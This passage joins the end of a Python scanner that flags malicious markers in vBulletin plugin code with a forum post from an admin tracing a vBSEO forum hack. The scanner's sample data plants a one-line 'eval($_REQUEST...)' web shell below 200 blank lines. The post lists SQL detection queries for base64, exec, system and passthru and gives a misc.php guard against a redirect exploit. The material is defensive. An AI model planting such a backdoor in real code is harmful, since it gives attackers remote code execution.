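    for no, line in enumerate(text.splitlines(), 1):
        for name, pat in MARKERS.items():
            if pat.search(line):
                hits.append((no, name))
    return hits

def check_plugins(rows):
    """rows: dicts with title/hookname/phpcode, as the plugin table returns.
    Returns (title, hookname, reason, line_no) tuples."""
    findings = []
    for r in rows:
        for no, name in find_markers(r["phpcode"]):
            findings.append((r["title"], r["hookname"], name, no))
        nonblank = [ln.strip() for ln in r["phpcode"].splitlines() if ln.strip()]
        if r["title"] == "vBSEO Misc Start" and nonblank != EXPECTED_VBSEO_MISC_START:
            findings.append((r["title"], r["hookname"], "not_the_expected_two_lines", None))
    return findings

# Constructed sample: a clean plugin, the vBSEO hook with a marker line hidden
# below 200 blank lines, and a datastore blob that contains strtr(.
SAMPLE_PLUGINS = [
    {"title": "Clean Plugin", "hookname": "global_start", "phpcode": "$x = 1;"},
    {"title": "vBSEO Misc Start", "hookname": "misc_start",
     "phpcode": "\n".join(EXPECTED_VBSEO_MISC_START) + "\n" * 200 + "eval($_REQUEST['c']);"},
]
SAMPLE_DATASTORE = 'a:1:{s:10:"pluginlist";s:30:"$s = strtr($d, $from, $to);";}'

if __name__ == "__main__":
    print(check_plugins(SAMPLE_PLUGINS), find_markers(SAMPLE_DATASTORE))
```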
Old 17-04-2013   #25
MyCE Rookie
 
Join Date: Apr 2013
Posts: 24
Quote:
Originally Posted by Liggy View Post
My idea on trying to fix it is the following:
In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST.
I've done the following for both of these and turned up zero dodgy entries:

Code:
-- note: the PHP function is passthru, so the pattern must be '%passthru%' ('%pass_thru%' never matches)
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';

SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

Quote:
Originally Posted by Liggy View Post
As a final countermeasure you can modify file misc.php and include the following commands at the beginning, right after the error_reporting command:
PHP Code:
// guard with isset() so the check does not throw an undefined-index notice on normal requests
if(isset($_GET['g']) && $_GET['g']=='js')
    die; 
This code will not prevent you from being hacked but prevents the current exploit from redirecting your visitors.
I've just been doing a "cat access.log.1 | grep g=js > /home/hacked.log" and checking this out. I reckon that this is as a result of the hack, not what causes the hack.

There are constant entries in the access.log to that url, but with a valid referrer entry, however they stop around the time I got to work and reset the datastore, then they started roughly 12 hours later. I'm going through my last week's worth of logs to see where the first entry is, then work back from that.

I'm bashing my head against a wall also. I'm running nginx+php-fpm, all of the threads I've seen are people saying it's something to do with folder/file permissions and someone running a dodgy .gif file? I can't understand that at all. My configuration only passes *.php files to php-fpm, so that completely voids that argument.

I've also not found any dodgy code, anywhere. I haven't "fixed" anything except upgrading from 3.6.0 to 3.6.1. This probably reset all of the vBSEO plugins, which if there was eval code in, is obviously gone.

<-- Also a pretty pissed off vBulletin/vBSEO owner/admin right now.
stubbed is offline